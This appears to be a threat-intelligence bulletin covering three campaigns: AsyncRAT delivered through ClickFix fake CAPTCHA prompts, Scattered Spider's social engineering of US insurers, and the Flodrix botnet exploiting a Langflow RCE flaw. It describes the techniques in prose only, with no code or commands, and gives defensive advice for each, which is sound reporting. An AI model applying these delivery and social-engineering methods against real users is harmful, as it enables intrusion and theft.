Update: Fileless AsyncRAT Campaign Targets Users with Fake Verification Prompts
A sophisticated campaign leveraging the fileless variant of AsyncRAT has been uncovered, attributed to cybercriminal groups that employ deceptive tactics to infiltrate users' systems. While the specific threat actor behind this campaign has not been conclusively identified, the attack shows many similarities to prior campaigns observed with AsyncRAT, indicating a familiar group is likely behind this operation. The attackers use the Clickfix technique— a social engineering method where victims are tricked into interacting with a seemingly benign verification prompt that often looks like a CAPTCHA. In this campaign, users are presented with a fake "I'm not a robot" checkbox, and upon clicking it, a malicious command is copied to their clipboard. This command triggers a hidden PowerShell script that executes the AsyncRAT payload entirely in memory. The attackers bypass traditional file-based security solutions using this method, as the malicious code never touches the disk. The risk and impact of this campaign are significant, especially as it continues to evade many security solutions due to its fileless nature. Once installed, AsyncRAT grants attackers remote access to the infected systems, allowing for credential theft, data exfiltration, and persistent system access without direct evidence on the disk. This campaign, likely active since April 2025, is part of an increasing trend where cyber criminals adapt older malware, like AsyncRAT, to more sophisticated and evasive delivery methods. While targeting a wide range of users, this attack seems particularly focused on individuals and organizations in the German-speaking regions, although it could have a wider impact. Obfuscated scripts and dynamic C2 communication indicate a highly targeted, adaptive attack. To defend against these evolving threats, organizations must adopt a combination of strong endpoint detection and response tools, proactive network segmentation, and advanced script logging to monitor for suspicious behaviors and ensure malware does not remain undetected in their environments.
Update: Scattered Spider Expands Its Reach, Targeting U.S. Insurance Sector with New Attack Methods
The Google Threat Intelligence Group (GTIG) has recently identified a surge in cyberattacks on U.S. insurance companies linked to the notorious threat group Scattered Spider, also known as 0ktapus, UNC3944, Scatter Swine, Starfraud, and Muddled Libra. We have previously reported that Scattered Spider has focused on retail industries in the UK and the U.S., but this marks a change in focus, with insurance companies being the new target. Two prominent insurance companies, Philadelphia Insurance Companies (PHLY) and Erie Insurance, disclosed cyberattacks in June 2025, leading to significant disruptions in their operations. PHLY experienced ongoing outages, and Erie reported "unusual network activity," which prompted immediate protective measures. These incidents align with Scattered Spider's previous tactics, which include social engineering techniques, particularly targeting help desk and call center personnel. Attackers often use aggressive language to manipulate employees into granting unauthorized access to critical systems. Scattered Spider's sophisticated approach involves a combination of social engineering, SIM swapping, MFA fatigue, and phishing, which has proven effective in bypassing even mature security systems. Once inside, the group deploys ransomware like RansomHub, Qilin, and DragonForce, causing severe damage to the victim organizations. This evolving attack method is more targeted and refined, with a noticeable shift toward the insurance industry. Previously, we reported on Scattered Spider's activities in retail and other sectors, but their new tactics and focus on insurance highlight their ability to adapt to new environments. To defend against such attacks, organizations must implement strong identity and access controls, including robust MFA for high-privilege accounts, and educate employees, especially those in help desk roles, on recognizing social engineering attempts. Monitoring for unusual login activity, particularly from residential IP ranges, and reviewing helpdesk authentication protocols can also provide early warning signs of a potential breach.
Flodrix Botnet Exploits Langflow RCE Vulnerability to Launch DDoS Attacks
A new variant of the Flodrix botnet is actively exploiting a critical vulnerability in Langflow, a Python-based framework for AI applications, to deploy malware and launch distributed denial-of-service (DDoS) attacks. The flaw tracked as CVE-2025-3248 (CVSS score: 9.8) allows unauthenticated attackers to execute arbitrary code on unpatched Langflow servers via crafted HTTP requests. Discovered and patched in March 2025, the vulnerability was flagged by CISA as being actively exploited in the wild, with attackers using publicly available proof-of-concept code to drop malicious shell scripts. These scripts then fetch and install the Flodrix botnet, establishing remote communication with a server and launching DDoS attacks against targeted IP addresses. The botnet’s capabilities extend to supporting connections through the TOR network, further complicating detection and attribution. Flodrix is an evolved version of the LeetHozer botnet linked to the Moobot group, and its new features enhance its ability to evade detection and minimize forensic traces. The malware obfuscates its command-and-control (C2) communication and introduces new, encrypted DDoS attack types to make analysis more challenging. Additionally, Flodrix can enumerate running processes, aiding its persistence and targeting high-value systems. Trend Micro’s analysis of the ongoing campaign indicates that attackers are actively developing this variant, evidenced by their use of different downloader scripts hosted on the same server, further suggesting continued exploitation. Organizations are advised to patch vulnerable Langflow instances immediately, monitor for unusual server behavior, and employ robust network security measures to defend against DDoS attacks and botnet infections.
